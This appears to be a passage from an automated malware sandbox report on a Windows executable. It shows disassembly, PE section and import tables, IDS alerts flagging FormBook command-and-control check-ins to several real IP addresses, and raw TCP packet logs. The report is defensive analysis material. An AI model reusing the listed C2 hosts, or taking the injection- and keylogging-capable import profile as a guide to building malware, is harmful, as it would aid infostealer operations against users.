                                                                            cmp edi, esi
                                                                            jbe 00007F1C614C80DAh
                                                                            cmp edi, eax
                                                                            jc 00007F1C614C843Eh
                                                                            bt dword ptr [004C0158h], 01h
                                                                            jnc 00007F1C614C80D9h
                                                                            rep movsb
                                                                            jmp 00007F1C614C83ECh
                                                                            cmp ecx, 00000080h
                                                                            jc 00007F1C614C82A4h
                                                                            mov eax, edi
                                                                            xor eax, esi
                                                                            test eax, 0000000Fh
                                                                            jne 00007F1C614C80E0h
                                                                            bt dword ptr [004BA370h], 01h
                                                                            jc 00007F1C614C85B0h
                                                                            bt dword ptr [004C0158h], 00000000h
                                                                            jnc 00007F1C614C827Dh
                                                                            test edi, 00000003h
                                                                            jne 00007F1C614C828Eh
                                                                            test esi, 00000003h
                                                                            jne 00007F1C614C826Dh
                                                                            bt edi, 02h
                                                                            jnc 00007F1C614C80DFh
                                                                            mov eax, dword ptr [esi]
                                                                            sub ecx, 04h
                                                                            lea esi, dword ptr [esi+04h]
                                                                            mov dword ptr [edi], eax
                                                                            lea edi, dword ptr [edi+04h]
                                                                            bt edi, 03h
                                                                            jnc 00007F1C614C80E3h
                                                                            movq xmm1, qword ptr [esi]
                                                                            sub ecx, 08h
                                                                            lea esi, dword ptr [esi+08h]
                                                                            movq qword ptr [edi], xmm1
                                                                            lea edi, dword ptr [edi+08h]
                                                                            test esi, 00000007h
                                                                            je 00007F1C614C8135h
                                                                            bt esi, 03h
                                                                            jnc 00007F1C614C8188h
                                                                            movdqa xmm1, dqword ptr [esi+00h]

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2012 UPD4 build 61030
                                                                            • [RES] VS2012 UPD4 build 61030
                                                                            • [LNK] VS2012 UPD4 build 61030

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5cb70.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1210000x6c4c.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xc40000x5cb700x5cc00c228c4ca7101f1a13bde382d7a69e3d9False0.9294769204851752data7.897484286094564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1210000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                            RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                            RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                            RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                            RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                            RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                            RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                            RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                            RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                            RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                            RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                            RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                            RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                            RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                            RT_RCDATA0xcc7b80x53e77data1.000322983318348
                                                                            RT_GROUP_ICON0x1206300x76dataEnglishGreat Britain0.6610169491525424
                                                                            RT_GROUP_ICON0x1206a80x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x1206bc0x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x1206d00x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x1206e40xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x1207c00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                            Imports

                                                                            DLLImport
                                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-25T13:57:30.494965+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149764154.215.72.11080TCP
                                                                            2024-11-25T13:58:04.614278+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149844116.50.37.24480TCP
                                                                            2024-11-25T13:59:28.291434+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114989985.159.66.9380TCP
                                                                            2024-11-25T13:59:43.521796+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114998791.195.240.9480TCP
                                                                            2024-11-25T14:00:07.086273+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114999166.29.149.4680TCP
                                                                            2024-11-25T14:00:22.539513+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149995195.110.124.13380TCP
                                                                            2024-11-25T14:00:54.382040+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149999217.196.55.20280TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 25, 2024 13:57:28.822839975 CET4976480192.168.2.11154.215.72.110
                                                                            Nov 25, 2024 13:57:28.944906950 CET8049764154.215.72.110192.168.2.11
                                                                            Nov 25, 2024 13:57:28.945003033 CET4976480192.168.2.11154.215.72.110
                                                                            Nov 25, 2024 13:57:28.947613001 CET4976480192.168.2.11154.215.72.110
                                                                            Nov 25, 2024 13:57:29.067826033 CET8049764154.215.72.110192.168.2.11
                                                                            Nov 25, 2024 13:57:30.494777918 CET8049764154.215.72.110192.168.2.11
                                                                            Nov 25, 2024 13:57:30.494844913 CET8049764154.215.72.110192.168.2.11
                                                                            Nov 25, 2024 13:57:30.494965076 CET4976480192.168.2.11154.215.72.110
                                                                            Nov 25, 2024 13:57:30.509110928 CET4976480192.168.2.11154.215.72.110
                                                                            Nov 25, 2024 13:57:30.629184008 CET8049764154.215.72.110192.168.2.11
                                                                            Nov 25, 2024 13:57:54.890856981 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:55.010945082 CET8049822116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:55.011221886 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:55.013698101 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:55.134432077 CET8049822116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:56.536145926 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:56.584685087 CET8049822116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:56.584768057 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:56.584801912 CET8049822116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:56.584845066 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:56.656193972 CET8049822116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:56.656259060 CET4982280192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:57.551510096 CET4983180192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:57.671530962 CET8049831116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:57.672065973 CET4983180192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:57.674516916 CET4983180192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:57.794450998 CET8049831116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:59.188987017 CET4983180192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:57:59.309452057 CET8049831116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:57:59.309531927 CET4983180192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:00.207945108 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:00.328347921 CET8049838116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:00.329200029 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:00.331348896 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:00.451308966 CET8049838116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:00.451410055 CET8049838116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:01.845241070 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:01.899795055 CET8049838116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:01.899928093 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:01.900846004 CET8049838116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:01.900895119 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:01.965392113 CET8049838116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:01.965475082 CET4983880192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:02.864053011 CET4984480192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:03.037214994 CET8049844116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:03.037297964 CET4984480192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:03.039386988 CET4984480192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:03.159610033 CET8049844116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:04.614001036 CET8049844116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:04.614192963 CET8049844116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:04.614278078 CET4984480192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:04.616976976 CET4984480192.168.2.11116.50.37.244
                                                                            Nov 25, 2024 13:58:04.737005949 CET8049844116.50.37.244192.168.2.11
                                                                            Nov 25, 2024 13:58:18.720066071 CET4988080192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:18.840123892 CET804988085.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:18.840235949 CET4988080192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:18.842212915 CET4988080192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:18.962270975 CET804988085.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:20.345228910 CET4988080192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:20.465543032 CET804988085.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:20.465670109 CET4988080192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:21.363941908 CET4988680192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:21.484301090 CET804988685.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:21.484477997 CET4988680192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:21.487127066 CET4988680192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:21.608639002 CET804988685.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:23.001468897 CET4988680192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:23.121813059 CET804988685.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:23.121876955 CET4988680192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:24.069865942 CET4989280192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:24.189778090 CET804989285.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:24.189918995 CET4989280192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:24.193815947 CET4989280192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:24.313890934 CET804989285.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:24.313910961 CET804989285.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:25.704575062 CET4989280192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:25.825429916 CET804989285.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:25.825568914 CET4989280192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:26.724315882 CET4989980192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:26.846155882 CET804989985.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:58:26.846240044 CET4989980192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:26.848601103 CET4989980192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:58:26.968621969 CET804989985.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:59:28.290719986 CET804989985.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:59:28.290837049 CET804989985.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:59:28.291434050 CET4989980192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:59:28.294701099 CET4989980192.168.2.1185.159.66.93
                                                                            Nov 25, 2024 13:59:28.414750099 CET804989985.159.66.93192.168.2.11
                                                                            Nov 25, 2024 13:59:33.824368954 CET4998480192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:33.944359064 CET804998491.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:33.944462061 CET4998480192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:33.946837902 CET4998480192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:34.066776037 CET804998491.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:35.222839117 CET804998491.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:35.222918987 CET804998491.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:35.222975016 CET4998480192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:35.454869986 CET4998480192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:36.489845991 CET4998580192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:36.610171080 CET804998591.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:36.610313892 CET4998580192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:36.616699934 CET4998580192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:36.736773968 CET804998591.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:37.935906887 CET804998591.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:37.936189890 CET804998591.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:37.936299086 CET4998580192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:38.128928900 CET4998580192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:39.428627014 CET4998680192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:39.550121069 CET804998691.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:39.550218105 CET4998680192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:39.553529024 CET4998680192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:39.673748016 CET804998691.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:39.673779964 CET804998691.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:40.838114977 CET804998691.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:40.838244915 CET804998691.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:40.838299990 CET4998680192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:41.064193010 CET4998680192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:42.084873915 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:42.204849958 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:42.205600977 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:42.208904982 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:42.328891039 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521635056 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521660089 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521671057 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521795988 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.521814108 CET804998791.195.240.94192.168.2.11
